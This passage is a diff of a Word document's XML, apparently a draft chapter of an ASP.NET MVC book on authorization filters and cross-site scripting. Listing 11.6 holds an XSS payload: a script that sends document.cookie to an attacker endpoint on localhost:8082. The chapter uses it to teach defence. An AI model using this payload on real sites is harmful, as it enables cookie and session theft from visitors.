       <w:r>
         <w:rPr>
           <w:rStyle w:val="CodeinText"/>
         </w:rPr>
         <w:t>OnAuthorization</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:t xml:space="preserve"> method (1)</w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve">, and sets the </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="CodeinText"/>
@@ -725,7 +1126,11 @@
         <w:t>AuthorizationContext</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve">'s </w:t>
+        <w:t>'s</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -736,15 +1141,18 @@
       <w:r>
         <w:t xml:space="preserve"> property to </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="CodeinText"/>
         </w:rPr>
         <w:t>HttpUnauthorizedResult</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:t xml:space="preserve"> - the mechanism for returning that </w:t>
       </w:r>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="CodeinText"/>
@@ -752,7 +1160,11 @@
         <w:t>401</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> status code</w:t>
+        <w:t xml:space="preserve"> status</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> code</w:t>
       </w:r>
       <w:r>
         <w:t>.</w:t>
@@ -765,12 +1177,14 @@
       <w:r>
         <w:t xml:space="preserve">There are several other </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="CodeinText"/>
         </w:rPr>
         <w:t>IAuthenticationFilter</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:t xml:space="preserve"> implementations in ASP.NET MVC; all are used to short-circuit the normal response to protect against undesired requests.</w:t>
       </w:r>
@@ -782,12 +1196,15 @@
           <w:rStyle w:val="CodeinText"/>
         </w:rPr>
       </w:pPr>
+      <w:commentRangeStart w:id="5"/>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="CodeinText"/>
         </w:rPr>
         <w:t>AuthorizeAttribute</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -796,12 +1213,14 @@
           <w:rStyle w:val="CodeinText"/>
         </w:rPr>
       </w:pPr>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="CodeinText"/>
         </w:rPr>
         <w:t>ChildActionOnlyAttribute</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -810,12 +1229,14 @@
           <w:rStyle w:val="CodeinText"/>
         </w:rPr>
       </w:pPr>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="CodeinText"/>
         </w:rPr>
         <w:t>RequireHttpsAttribute</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -824,12 +1245,14 @@
           <w:rStyle w:val="CodeinText"/>
         </w:rPr>
       </w:pPr>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="CodeinText"/>
         </w:rPr>
         <w:t>ValidateAntiForgeryTokenAttribute</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -838,26 +1261,38 @@
           <w:rStyle w:val="CodeinText"/>
         </w:rPr>
       </w:pPr>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="CodeinText"/>
         </w:rPr>
         <w:t>ValidateInputAttribute</w:t>
       </w:r>
-    </w:p>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:commentRangeEnd w:id="5"/>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Body1"/>
       </w:pPr>
       <w:r>
+        <w:rPr>
+          <w:rStyle w:val="CommentReference"/>
+          <w:vanish/>
+        </w:rPr>
+        <w:commentReference w:id="5"/>
+      </w:r>
+      <w:r>
         <w:t xml:space="preserve">We've seen how </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="CodeinText"/>
         </w:rPr>
         <w:t>AuthorizeAttribute</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:t xml:space="preserve"> can help us manage authentication and authorization, now let's turn our attention to other</w:t>
       </w:r>
@@ -876,27 +1311,66 @@
         <w:pStyle w:val="Head1"/>
       </w:pPr>
       <w:r>
-        <w:t>11.2 Cross Site Scripting (XSS)</w:t>
+        <w:t xml:space="preserve">11.2 </w:t>
+      </w:r>
+      <w:commentRangeStart w:id="6"/>
+      <w:r>
+        <w:t xml:space="preserve">Cross Site </w:t>
+      </w:r>
+      <w:commentRangeEnd w:id="6"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="CommentReference"/>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
+          <w:b w:val="0"/>
+          <w:i w:val="0"/>
+          <w:vanish/>
+          <w:color w:val="000000"/>
+        </w:rPr>
+        <w:commentReference w:id="6"/>
+      </w:r>
+      <w:r>
+        <w:t>Scripting (XSS)</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Body1"/>
       </w:pPr>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:t xml:space="preserve">Cross </w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve">site scripting </w:t>
+        <w:t>site</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> scripting </w:t>
       </w:r>
       <w:r>
         <w:t>is a technique where a malicious user manipulates the system so that special JavaScript appears on the vuln</w:t>
       </w:r>
       <w:r>
-        <w:t>erable website - script</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> that</w:t>
+        <w:t xml:space="preserve">erable </w:t>
+      </w:r>
+      <w:commentRangeStart w:id="7"/>
+      <w:r>
+        <w:t>website - script</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:commentRangeEnd w:id="7"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="CommentReference"/>
+          <w:vanish/>
+        </w:rPr>
+        <w:commentReference w:id="7"/>
+      </w:r>
+      <w:r>
+        <w:t>that</w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve"> v</w:t>
@@ -905,7 +1379,6 @@
         <w:t xml:space="preserve">isiting browsers </w:t>
       </w:r>
       <w:r>
-        <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">subsequently </w:t>
       </w:r>
       <w:r>
@@ -976,7 +1449,15 @@
         <w:t xml:space="preserve"> applications.  One is vulne</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve">rable to cross site scripting. </w:t>
+        <w:t xml:space="preserve">rable to </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>cross site</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> scripting. </w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve">It features a simple comment submission page. </w:t>
@@ -1019,10 +1500,33 @@
         <w:pStyle w:val="Body1"/>
       </w:pPr>
       <w:r>
-        <w:t>When the example Visual Studio solution is run (typically with CTRL-F5), two sites appear in the web browser.  The vulnerable site sets a cookie, ostensibly containing sensitive data. The second site is the attacker</w:t>
-      </w:r>
-      <w:r>
-        <w:t>, it will collect the data from our evil request</w:t>
+        <w:t>When the example Visual Studio solution is run (</w:t>
+      </w:r>
+      <w:commentRangeStart w:id="8"/>
+      <w:r>
+        <w:t xml:space="preserve">typically with CTRL-F5), </w:t>
+      </w:r>
+      <w:commentRangeEnd w:id="8"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="CommentReference"/>
+          <w:vanish/>
+        </w:rPr>
+        <w:commentReference w:id="8"/>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">two sites appear in the web browser.  The vulnerable site sets a cookie, ostensibly containing sensitive data. The second site is the </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>attacker</w:t>
+      </w:r>
+      <w:r>
+        <w:t>,</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> it will collect the data from our evil request</w:t>
       </w:r>
       <w:r>
         <w:t>.  The attacking site has a page that should read "</w:t>
@@ -1048,11 +1552,17 @@
         <w:t>l</w:t>
       </w:r>
       <w:r>
-        <w:t>isting 115, traditional cookie-setting code</w:t>
+        <w:t>isting 11</w:t>
       </w:r>
       <w:r>
         <w:t>.</w:t>
       </w:r>
+      <w:r>
+        <w:t>5, traditional cookie-setting code</w:t>
+      </w:r>
+      <w:r>
+        <w:t>.</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -1066,8 +1576,21 @@
       <w:pPr>
         <w:pStyle w:val="Code"/>
       </w:pPr>
-      <w:r>
-        <w:t>public ActionResult Index()</w:t>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>public</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>ActionResult</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> Index()</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1085,30 +1608,68 @@
       <w:r>
         <w:tab/>
       </w:r>
-      <w:r>
-        <w:t>var cookie = new HttpCookie("mvcinaction", "secret");</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Code"/>
-      </w:pPr>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:t>Response.SetCookie(cookie);</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Code"/>
-      </w:pPr>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:t>return View();</w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>var</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> cookie = new </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>HttpCookie</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>("</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>mvcinaction</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>", "secret");</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Code"/>
+      </w:pPr>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>Response.SetCookie</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>cookie);</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Code"/>
+      </w:pPr>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>return</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> View();</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1138,7 +1699,6 @@
         <w:rPr>
           <w:noProof/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0">
             <wp:extent cx="4800600" cy="3792220"/>
@@ -1152,129 +1712,6 @@
                 <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                   <pic:nvPicPr>
                     <pic:cNvPr id="0" name="xss before.png"/>
-                    <pic:cNvPicPr/>
-                  </pic:nvPicPr>
-                  <pic:blipFill>
-                    <a:blip r:embed="rId8" cstate="print"/>
-                    <a:stretch>
-                      <a:fillRect/>
-                    </a:stretch>
-                  </pic:blipFill>
-                  <pic:spPr>
-                    <a:xfrm>
-                      <a:off x="0" y="0"/>
-                      <a:ext cx="4800600" cy="3792220"/>
-                    </a:xfrm>
-                    <a:prstGeom prst="rect">
-                      <a:avLst/>
-                    </a:prstGeom>
-                  </pic:spPr>
-                </pic:pic>
-              </a:graphicData>
-            </a:graphic>
-          </wp:inline>
-        </w:drawing>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="FigureCaption"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Figure 11.1 The comments page</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Body1"/>
-      </w:pPr>
-      <w:r>
-        <w:t>We included a button that will automatically insert a malicious comment in the Comment text area.</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> The comment appears in Listing 11.6</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="CodeListingCaption"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Listing 11.6 A malicious comment</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Code"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">A long comment &lt;script&gt;document.write('&lt;img src=http://localhost:8082/attack/register?input=' </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">  #1</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Code"/>
-      </w:pPr>
-      <w:r>
-        <w:t>+escape(document.cookie)+ '/&gt;')&lt;/script&gt;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Body1"/>
-      </w:pPr>
-      <w:r>
-        <w:t>This comment includes a script block.  The script block writes HTML to the browser.  The HTML contains an image whose SRC attribute</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="Bold"/>
-        </w:rPr>
-        <w:t>(1)</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> is not an image at all, but the browser doesn't know that.  The browser sends a request to the attacking server with the cookie in the query string. </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Body"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">After we save the comment, on the subsequent page where the comment is displayed, </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">shown in figure 11.2, </w:t>
-      </w:r>
-      <w:r>
-        <w:t>the script is executed.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0">
-            <wp:extent cx="4800600" cy="3792220"/>
-            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
-            <wp:docPr id="4" name="Picture 3" descr="xss after.png"/>
-            <wp:cNvGraphicFramePr>
-              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
-            </wp:cNvGraphicFramePr>
-            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
-              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                  <pic:nvPicPr>
-                    <pic:cNvPr id="0" name="xss after.png"/>
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
@@ -1304,7 +1741,198 @@
         <w:pStyle w:val="FigureCaption"/>
       </w:pPr>
       <w:r>
-        <w:t>Figure 11.2 The comment - unbeknownst to the visitor a nasty script is executed</w:t>
+        <w:t xml:space="preserve">Figure 11.1 </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>The</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> comments page</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Body1"/>
+      </w:pPr>
+      <w:r>
+        <w:t>We included a button that will automatically insert a malicious comment in the Comment text area.</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> The comment appears in Listing 11.6</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="CodeListingCaption"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Listing 11.6 </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>A</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> malicious comment</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Code"/>
+      </w:pPr>
+      <w:r>
+        <w:t>A long comment &lt;script&gt;</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>document.write</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>'&lt;</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>img</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>src</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">=http://localhost:8082/attack/register?input=' </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">  #1</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Code"/>
+      </w:pPr>
+      <w:r>
+        <w:t>+</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>escape</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>document.cookie</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>)+ '/&gt;')&lt;/script&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Body1"/>
+      </w:pPr>
+      <w:r>
+        <w:t>This comment includes a script block.  The script block writes HTML to the browser.  The HTML contains an image whose SRC attribute</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Bold"/>
+        </w:rPr>
+        <w:t>(1)</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> is not an image at all, but the browser doesn't know that.  The browser sends a request to the attacking server with the cookie in the query string. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Body"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">After we save the comment, on the subsequent page where the comment is displayed, </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">shown in figure 11.2, </w:t>
+      </w:r>
+      <w:r>
+        <w:t>the script is executed.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0">
+            <wp:extent cx="4800600" cy="3792220"/>
+            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
+            <wp:docPr id="4" name="Picture 3" descr="xss after.png"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name="xss after.png"/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId10" cstate="print"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="4800600" cy="3792220"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="FigureCaption"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Figure 11.2 </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>The</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> comment - unbeknownst to the visitor a nasty script is executed</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1331,41 +1959,88 @@
         <w:pStyle w:val="Code"/>
       </w:pPr>
       <w:r>
-        <w:t>&lt;p&gt;Comment:&lt;/p&gt;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Code"/>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Code"/>
-      </w:pPr>
-      <w:r>
-        <w:t>&lt;p&gt;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Code"/>
-      </w:pPr>
-      <w:r>
-        <w:tab/>
-        <w:t>A long comment &lt;script&gt;document.write(</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">      |#1</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Code"/>
-      </w:pPr>
-      <w:r>
-        <w:tab/>
-        <w:t>'&lt;img src=http://localhost:8082/attack/</w:t>
+        <w:t>&lt;</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>p</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>&gt;Comment:&lt;/p&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Code"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Code"/>
+      </w:pPr>
+      <w:r>
+        <w:t>&lt;</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>p</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Code"/>
+      </w:pPr>
+      <w:r>
+        <w:tab/>
+        <w:t>A long comment &lt;script&gt;</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>document.write</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>(</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">      |</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>#1</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Code"/>
+      </w:pPr>
+      <w:r>
+        <w:tab/>
+        <w:t>'&lt;</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>img</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>src</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>=http://localhost:8082/attack/</w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve">     |#1</w:t>
@@ -1377,7 +2052,27 @@
       </w:pPr>
       <w:r>
         <w:tab/>
-        <w:t>register?input=' +escape(document.cookie)</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>register</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>?input</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>=' +escape(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>document.cookie</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>)</w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve">   |#1</w:t>
@@ -1408,7 +2103,15 @@
         <w:pStyle w:val="CodeAnnotation"/>
       </w:pPr>
       <w:r>
-        <w:t>#1 Our nasty script</w:t>
+        <w:t xml:space="preserve">#1 </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>Our</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> nasty script</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1445,7 +2148,6 @@
         <w:rPr>
           <w:noProof/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0">
             <wp:extent cx="4800600" cy="1496060"/>
@@ -1462,7 +2164,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId10" cstate="print"/>
+                    <a:blip r:embed="rId11" cstate="print"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -1511,8 +2213,28 @@
       <w:pPr>
         <w:pStyle w:val="Body1"/>
       </w:pPr>
-      <w:r>
-        <w:t>Never trust input.  Never, ever, ever expect input to be safe.  Whether its from a human user or a machine, dangerous input is the root attack vector involved in XSS attacks.  We don't trust it coming in, and we certainly don't trust it when we render it.  That's the key.</w:t>
+      <w:commentRangeStart w:id="9"/>
+      <w:r>
+        <w:t xml:space="preserve">Never trust input.  Never, ever, ever expect input to be safe.  </w:t>
+      </w:r>
+      <w:commentRangeEnd w:id="9"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="CommentReference"/>
+          <w:vanish/>
+        </w:rPr>
+        <w:commentReference w:id="9"/>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">Whether </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>its</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> from a human user or a machine, dangerous input is the root attack vector involved in XSS attacks.  We don't trust it coming in, and we certainly don't trust it when we render it.  That's the key.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1537,10 +2259,17 @@
         <w:pStyle w:val="Body1"/>
         <w:rPr>
           <w:rStyle w:val="CodeinText"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:t>One vulnerability with our example application is that it rendered the submitted script as scrip</w:t>
+          <w:b/>
+          <w:smallCaps/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>One vulnerability</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> with our example application is that it rendered the submitted script as scrip</w:t>
       </w:r>
       <w:r>
